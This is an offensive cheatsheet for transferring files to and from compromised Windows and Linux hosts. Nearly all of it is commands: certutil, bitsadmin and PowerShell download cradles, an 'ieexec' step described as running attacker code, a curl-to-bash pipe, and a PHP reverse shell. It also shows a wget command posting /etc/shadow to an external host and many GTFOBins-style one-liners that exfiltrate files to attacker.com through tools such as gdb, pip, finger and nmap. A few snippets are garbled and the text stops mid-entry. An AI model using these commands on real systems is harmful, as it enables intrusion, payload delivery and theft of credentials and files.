Ultimate - File Transfer Cheatsheet

───✱*.｡:｡✱*.:｡✧*.｡✰*.:｡✧*.｡:｡*.｡✱ ───

File Transfer

What is this ?

This is my cheatsheet to transfer files to and from target machines which are Windows or Linux hosts. This is divided into two sections : -

Windows
Linux

In each section I have listed which are the main techniques that will allow you to easily transfer files. The last part in each of the section above is named as Others which will show some more tricks in a system that is very hardened it might be useful. I haven’t had to use any of those yet on all the machines that I have solved however if need arises its something you could try.

Windows

Bitsadmin

bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file

Certutil

certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file

debug.exe

The debug.exe program acts as an assembler, disassembler, and a hex dumping tool. We’re able to take binaries like netcat ~ nc.exe and disassemeble them into hex. A series of non-interactive echo commands will write out the binary file into its hex representation. We can then use debug.exe to assemble the hex file into the original binary file nc.exe on the compromised host. There is a 64k size limit for transferable files.

On Kali : upx -9 nc.exe

This is close to our limit. We can use upx ~ (executable packer) to compress it further:

The file size is now more suitable for transfer and has been decreased in size by almost 50%. We can now convert the nc.exe file into a text file usable by debug.exe on our compromised Windows host. The tool we’ll be using is exe2bat.exe

cp /usr/share/windows-binaries/exe2bat.exe . Copy exe2bat to current working directory.

wine exe2bat.exe nc.exe nc.txt

This will produce a nc.txt file we can simply copy paste into the remote windows shell, and nc.exe will be automatically created on the compromised host.

OpenSSL

Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes Serve the file on Kali : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file Execute on Windows box to transfer file to C:\file : C:\path\to\openssl.exe s_client -quiet-connect AttackerIP:1234 > C:\file

PowerShell

Within PowerShell

Invoke-WebRequest -Uri "http:/AttackerIP/file" -OutFile "C:\path\to\file"
(New-Object Net.WebClient).downloadFile('http://10.10.14.45/shell.bat', 'C:\Users\Public\Downloads\shell.bat')

Outside PowerShell

powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://AttackerIP/file')

Non-Interactive PowerShell script

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://AttackerIP/file" >>wget.ps1 
echo $file = "file" >>wget.ps1 
echo $webclient.DownloadFile($url,$file) >>wget.ps1 
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive NoProfile -File wget.ps1

IWR “http://yourip/shell.exe” -OutFile “shell.exe” , use this incase of transferring files from HTTP.

SMB

SMBserver.py

On Kali : python smbserver.py transfer_share /root/shells/shell.exe

On Target Windows :

// We can then check that our SMB share is up and running from our compromised Windows host

net view \\AttackerIP

// Windows commands like dir and copy can also be used

dir \\AttackerIP\transfer_share copy \\AttackerIP\transfer_share\shell.exe

//Executing shell.exe on compromised Windows host via our SMB share ~ transfer_share

C:> \\AttackerIP\transfer_share\shell.exe

Impacket-SMBServer

On Kali : impacket-smbserver ShareName SharePath

On Windows (Powershell) : New-PSDrive -Name ShareName -PSProvider "FileSystem" -Root "\\Kali-IP\\ShareName"

If have to be done natively this can be used : net usershare add test /mount '' 'Everyone:F' guest_ok=y probably mount this on a docker container share.

TFTP

tftp -i AttackerIP get file

On Kali : apt-get install python-pyftpdlib && python -m pyftpdlib -p 21

With the server up and running, we can transfer files interactively or non-interactively:

Interactively :

//Interactive
C:> ftp AttackerIP
Connected to AttackerIP
User: anonymous 
Password: anonymous
...
ftp> binary 
ftp> get shell.exe

Non-Interactive :

//Non-Interactive
C:> echo open AttackerIP > c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo binary >> c:\ftp.txt
C:> echo get shell.exe >> c:\ftp.txt
C:> echo bye >> c:\ftp.txt
C:> ftp -s:C:\ftp.txt

Visual Basic Script (VBS)

Option 1 :

// Paste each line seperately into Windows shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs 
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 
echo Err.Clear >> wget.vbs 
echo Set http = Nothing >> wget.vbs 
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 
echo http.Open "GET", strURL, False >> wget.vbs 
echo http.Send >> wget.vbs 
echo varByteArray = http.ResponseBody >> wget.vbs 
echo Set http = Nothing >> wget.vbs 
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 
echo strData = "" >> wget.vbs 
echo strBuffer = "" >> wget.vbs 
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 
echo Next >> wget.vbs 
echo ts.Close >> wget.vbs

cscript wget.vbs http://AttackerIP/file file

Option 2 : echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs

cscript transfer.vbs

Others

bitsadmin.exe Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 Privileges required : User
certutil.exe Download and save 7zip to disk in the current folder. certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe Privileges required : User

Download and save 7zip to disk in the current folder. certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe Privileges required : User

desktopimgdownldr.exe

Download Downloads the file and sets it as the computer’s lockscreen set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr Usecase : Download arbitrary files from a web server

Esentutl.exe

Download : Copies the source EXE to the destination EXE file esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o Usecase : Use to copy files from one unc path to another

Expand.exe

Download : Copies source file to destination. expand \\webdav\folder\file.bat c:\ADS\file.bat Usecase:Use to copies the source file to the destination file

Extrac32.exe

Download Copy the source file to the destination file and overwrite it. extrac32 /Y /C \webdavserver\share\test.txt C:\folder\test.txt Usecase:Download file from UNC/WEBDav

Findstr.exe

Download Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file. findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe Usecase : Download/Copy file from webdav server

Ftp.exe

Download cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Usecase : Spawn new process using ftp.exe. Ftp.exe downloads the binary.

GfxDownloadWrapper.exe

Download GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by “Microsoft Windows Hardware”, “Compatibility Publisher”, “Microsoft Windows Third Party Component CA 2012”, “Microsoft Time-Stamp PCA 2010”, “Microsoft Time-Stamp Service”. C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" Usecase : Download file from internet

Hh.exe

Download Open the target PowerShell script with HTML Help. HH.exe http://some.url/script.ps1 Usecase : Download files from url

Ieexec.exe

Download Downloads and executes bypass.exe from the remote server. ieexec.exe http://x.x.x.x:8080/bypass.exe Usecase : Download and run attacker code from remote location

Makecab.exe

Download Download and compresses the target file and stores it in the target file. makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab Usecase : Download file and compress into a cab file

Replace.exe

Download Download/Copy bar.exe to outdir replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A Usecase : Download file

Excel.exe

Download Downloads payload from remote server Excel.exe http://192.168.1.10/TeamsAddinLoader.dll Usecase:It will download a remote payload and place it in the cache folder

Powerpnt.exe

Download Downloads payload from remote server Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

Download The above binary will go to url and look for RELEASES file and download the nuget package. squirrel.exe --download [url to package] Usecase : Download binary

Update.exe

Download The above binary will go to url and look for RELEASES file and download the nuget package. Update.exe --download [url to package] Usecase : Download binary

Winword.exe

Download Downloads payload from remote server winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

Download Downloads file from 192.168.1.10 wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Usecase : Download file

Linux

Bash

cat backup.7z > /dev/tcp/10.10.14.3/9001

curl

curl http://AttackerIP/file --output /var/tmp/file

curl AttackerIP/linenum.sh | bash

# upload to SMB server 

<?php
exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.48/1234 0>&1’”);
phpinfo();
?>

fetch (freeBSD)

fetch -o /var/tmp/file "http://AttackerIP/file"

netcat

nc -nlvp 1234 < file

cat file | nc AttackerIP 1234

Transfering files with progress in nc :

On Server Side : cat backup.iso | pv -b | nc -l 3333

On Client Side : nc 192.168.0.1 3333 | pv -b > backup.iso

Preferably run it on our side because we will have the required dependency nc -lvp 1235 | pv -b > file

OpenSSL

Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes Serve file (on Kali) : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file Execute on Linux host to GET the file : openssl s_client -quiet-connect AttackerIP:1234 > file

Python

#!/usr/bin/python 
import urllib2 
 
u = urllib2.urlopen('http://AttackerIP/file') 
localFile = open('local_file', 'w') 
localFile.write(u.read()) 
localFile.close()

chmod +x download.py

python download.py

rsync

Download Folder : rsync -r rsync://user@ip/<remote_dir>/ .
Upload Folder : rsync -vvaP -6 <local dir> "rsync://user@ip/<remote dir>"

SCP

To download file from remote system (remote → local) : scp user@remote_host:remote_file local_file
To upload file to remote server (local → remote): scp local_file user@remote_host:remote_file

socat

socat TCP4-LISTEN:8000,fork file:<file to transfer> // server socat TCP4:<ip>:8000 file:<file to get>,create // client

wget

wget http://AttackerIP/file -o /var/tmp/file sudo wget --post-file=/etc/shadow 10.10.10.142

Others

bash

1.1

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

1.2

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'

cpan

cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();

Curl
File upload It can exfiltrate files on the network. Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the @ to send hard-coded data.

URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL

File download It can download remote files.

Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE

Easy Install

File Upload It can exfiltrate files on the network.

Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

export URL=http://attacker.com/
export LFILE=file_to_send
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
easy_install $TF

Serve files in the local folder running an HTTP server.

export LPORT=8888
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
easy_install $TF

File Download It can download remote files. Fetch a remote file via HTTP GET request. The file path must be absolute.

```
export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(whereis python)', '$(whereis python)', '-c', \"\"\"import sys;
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
pip install $TF
```

Finger

File Upload : It can exfiltrate files on the network.

Send a binary file to a TCP port. Run sudo nc -l -p 79 | base64 -d > “file_to_save” on the attacker box to collect the file. The file length is limited by the maximum size of arguments.

RHOST=attacker.com
LFILE=file_to_send
finger "$(base64 $LFILE)@$RHOST"

File Download It can download remote files. Fetch remote binary file from a remote TCP port. Run base64 “file_to_send” | sudo nc -l -p 79 on the attacker box to send the file.

RHOST=attacker.com
LFILE=file_to_save
finger x@$RHOST | base64 -d > "$LFILE"

File Upload. It can exfiltrate files on the network. Send local file to a FTP server.

RHOST=attacker.com
ftp $RHOST
put file_to_send

File Download It can download remote files. Fetch a remote file from a FTP server.

RHOST=attacker.com
ftp $RHOST
get file_to_get

File upload

It can exfiltrate files on the network.

This requires that GDB is compiled with Python support. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

export URL=http://attacker.com/
export LFILE=file_to_send
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' -ex quit

This requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.

export LPORT=8888
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit

File Download

It can download remote files. This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.

    export URL=http://attacker.com/file_to_get
    export LFILE=file_to_save
    gdb -nx -ex 'python import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r
    else: import urllib as r
    r.urlretrieve(e["URL"], e["LFILE"])' -ex quit

GIMP

File upload : It can exfiltrate files on the network.

Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

export URL=http://attacker.com/
export LFILE=file_to_send
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'

Serve files in the local folder running an HTTP server.

```
export LPORT=8888
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
```

File download : It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'

File upload : It can exfiltrate files on the network. Serve files in the local folder running an HTTP server on port 8888.

irb
require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;

File download : It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
irb
require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['LFILE'])

File download : It can download remote files. Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
echo "var URL = Java.type('java.net.URL');
var ws = new URL('$URL');
var Channels = Java.type('java.nio.channels.Channels');
var rbc = Channels.newChannel(ws.openStream());
var FileOutputStream = Java.type('java.io.FileOutputStream');
var fos = new FileOutputStream('$LFILE');
fos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);
fos.close();
rbc.close();" | jjs

jrunscript

File download : It can download remote files. Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
jrunscript -e "cp('$URL','$LFILE')"

File upload : It can exfiltrate files on the network.

Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'

Send local file using a TCP connection. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.
```
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
```

File download : It can download remote files. Fetch a remote file via HTTP GET request.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

Fetch remote file using a TCP connection. Run nc -l -p 12345 < "file_to_send" on the attacker box to send the file.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'

File upload : It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires lua-socket installed.

```
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
lua -e '
local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
loc0al s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
```

File download : It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires lua-socket installed.

```
export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
```

LWP-download

File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file. This requires lua-socket installed.

  RHOST=attacker.com
  RPORT=12345
  LFILE=file_to_send
  lua -e '
  local f=io.open(os.getenv("LFILE"), 'rb')
  local d=f:read("*a")
  io.close(f);
  local s=require("socket");
  local t=assert(s.tcp());
  t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
  t:send(d);
  t:close();'

File download ; It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires lua-socket installed.

export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'

File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"

File download. It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file.

    LPORT=12345
    LFILE=file_to_save
    nc -l -p $LPORT > "$LFILE"

nmap

File upload : It can exfiltrate files on the network.

- Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork` - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.

```
    RHOST=attacker.com
    RPORT=8080
    LFILE=file_to_send
    nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE
```

Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
TF=$(mktemp)
echo 'local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();' > $TF
nmap --script=$TF

File download : It can download remote files.

Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., php -S 0.0.0.0:8080. Note that multiple connections are made to the server and the result is placed in $TF/IP/PORT/PATH. Also, it is important that the port is a commonly used HTTP like 80 or 8080.

RHOST=attacker.com
RPORT=8080
TF=$(mktemp -d)
LFILE=file_to_save
nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE

Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file.

export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);' > $TF
nmap --script=$TF

openssl

File upload : It can exfiltrate files on the network. To collect the file run the following on the attacker box:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save

Send a local file via TCP. Transmission will be encrypted.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"

File download It can download remote files. To send the file run the following on the attacker box:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send

Fetch a file from a TCP port, transmission will be encrypted.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"

File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.

LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT

File download. It can download remote files. Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

File upload.

It can exfiltrate files on the network.

Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

export URL=http://attacker.com/
export LFILE=file_to_send
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
pip install $TF

Serve files in the local folder running an HTTP server.

export LPORT=8888
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
pip install $TF

File download.

It can download remote files. Fetch a remote file via HTTP GET request. It needs an absolute local file path.

export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' > $TF/setup.py
pip install $TF

python

File upload.

It can exfiltrate files on the network.

Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

export URL=http://attacker.com/
export LFILE=file_to_send
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'

Serve files in the local folder running an HTTP server.

export LPORT=8888
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'

File download.

It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'

Ruby

File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.

export LPORT=8888
ruby -run -e httpd . -p $LPORT

File download. It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
ruby -e 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])'

rvim

File upload. It can exfiltrate files on the network.

- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

```
export URL=http://attacker.com/
export LFILE=file_to_send
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
```

- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.

```
export LPORT=8888
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
```

- Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"`on the attacker box to collect the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.

```
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
rvim -c ':lua local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
```

File download.

It can download remote files.

This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'

Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.

export LPORT=12345
export LFILE=file_to_save
rvim -c ':lua local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'

File upload : It can exfiltrate files on the network. Send local file to a SSH server.

```
RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send
scp $LFILE $RPATH
```

File Download :

It can download remote files. Fetch a remote file from a SSH server.

RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save
scp $RPATH $LFILE

SFTP

File upload. It can exfiltrate files on the network. Send local file to a SSH server.

RHOST=user@attacker.com
sftp $RHOST
put file_to_send file_to_save

File download. It can download remote files. Fetch a remote file from a SSH server.

RHOST=user@attacker.com
sftp $RHOST
get file_to_get file_to_save

SMBCLIENT

File upload : It can exfiltrate files on the network. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to collect the file.

smbclient '\\attacker\share' -c 'put file_to_send where_to_save'

File download : It can download remote files. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to send the file.

smbclient '\\attacker\share' -c 'put file_to_send where_to_save'

socat

File upload. It can exfiltrate files on the network.

Run socat -u tcp-listen:12345,reuseaddr open:file_to_save,create on the attacker box to collect the file.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
socat -u file:$LFILE tcp-connect:$RHOST:$RPORT

File download : It can download remote files. Run socat -u file:file_to_send tcp-listen:12345,reuseaddr on the attacker box to send the file.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat

File upload. It can exfiltrate files on the network. Send local file to a SSH server.

HOST=user@attacker.com
RPATH=file_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH

File download ; It can download remote files.

Fetch a remote file from a SSH server.

HOST=user@attacker.com
RPATH=file_to_get
